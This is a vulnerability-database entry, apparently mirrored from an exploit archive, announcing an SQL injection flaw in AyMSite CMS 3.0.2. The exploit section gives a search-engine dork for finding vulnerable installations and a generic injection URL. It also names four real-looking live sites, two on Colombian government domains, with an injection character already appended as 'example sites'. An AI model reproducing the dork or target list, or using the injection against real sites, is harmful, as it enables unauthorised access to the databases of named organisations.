AyMSite CMS 3.0.2 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047313 漏洞类型
发布时间 2012-06-12 更新时间 2012-06-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060129
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##################################################
# Exploit Title: AyMSite V 3.0.2  [ sqli ]
# Vendor: http://www.aymsoft.com/
# Date: 08/06/2012
# Author: xDarkSton3x
#Dork: inurl:aym_index.php?option=
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Example Sites : 
http://www.satena.gov.co/aym_index.php?option=ciudadano&pag_cat_id=3&pag_id=%27
http://www.cartagenamusicfestival.com/aym_index.php?option=artists&alr=&pag_id=%27
http://www.sht.com.co/aym_index.php?option=servicios&pag_cat_id=5&pag_id=%27
http://www.findeter.gov.co/aymsite/aym_index.php?&option=servicios&pag_cat_id=%27

##################################################

[~]Exploit/p0c :
http://www.site.com/aym_index.php?option=var=&var2=[sqli]


Greetz: [ Insecurity Peru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]